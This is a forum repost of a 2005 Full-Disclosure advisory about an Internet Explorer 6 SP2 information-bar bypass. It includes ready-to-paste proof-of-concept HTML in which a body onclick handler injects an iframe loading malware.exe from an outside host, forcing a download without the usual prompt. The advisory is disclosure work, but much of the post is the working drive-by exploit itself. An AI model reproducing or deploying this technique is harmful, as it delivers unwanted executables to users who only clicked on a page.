Wieners, Brats, Franks, we've got 'em all.
0 Members and 1 Guest are viewing this topic.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Application: Internet ExplorerVendors: http://www.microsoft.comVersions: 6.0.2900.2180.xpsp_sp2_rtm.040803-2158Patched With: SP2;Platforms: WindowsBug: Remote File Download Information Bar BypassExploitation: Remote with browserDate: 13 Jan 2005Author: Rafel Ivgi, The-Insidere-mail: the_insider@mail.comweb: http://theinsider.deep-ice.com~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~1) Introduction2) Bugs3) The Code~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~===============1) Introduction===============Internet Explorer is currently the most common internet browser in theworld.Microsoft Windows XP Service Pack 2 was designed to block any file downloadby an information bar which must be clicked and selected with "DownloadFile".~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~======2) Bug======While trying to download a file Microsoft Internet Explorerthe user gets the information bar. The information barmechanism blocks/catches all references to download-able files,even through javascripts and HTML Event properties.However Microsoft's Internet Explorer (SP2) DOES NOT CATCH"body" tag with the HTML "onclick" event which dynamicallycreated "iframe" tags. For a good, more complicated dynamicobject creation i used the "createElement" function.This way an attacker can make a user download a file with him justclicking anywhere on the page (not on an hyperlink).~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~===========3) The Code===========Paste into an htm/html file and add "<" at the begining of each line:------------------------ cut here --------------------------------------!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">!-- saved from url=(0031)http://theinsider.deep-ice.com/ -->HTML><HEAD><TITLE>The-Insider http://theinsider.deep-ice.com</TITLE>META http-equiv=expires content="01 Jan 1998 01:01:00 GMT">META http-equiv=Content-Type content="text/html; charset=windows-1252">META http-equiv=Content-Language content=en-us>META content=True name=HandheldFriendly>META content="MSHTML 6.00.2900.2523" name=GENERATOR></HEAD>embed>body onclick='a=document.createElement("\<iframesrc=\"http:\/\/theinsider.deep-ice.com\/malware.exe\"\>\<\/iframe\>");document.body.appendChild(a);setTimeout("document.execCommand\(\"refresh\")",1000)'>cebter><br><br><br><br><br><br>Click AnyWhere You Want</center>/BODY></HTML>------------------------ cut here --------------------------------------~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~---Rafel Ivgi, The-Insiderhttp://theinsider.deep-ice.com"Scripts and Codes will make me D.O.S , but they will never HACK me."_______________________________________________Full-Disclosure - We believe in it.Charter: http://lists.netsys.com/full-disclosure-charter.html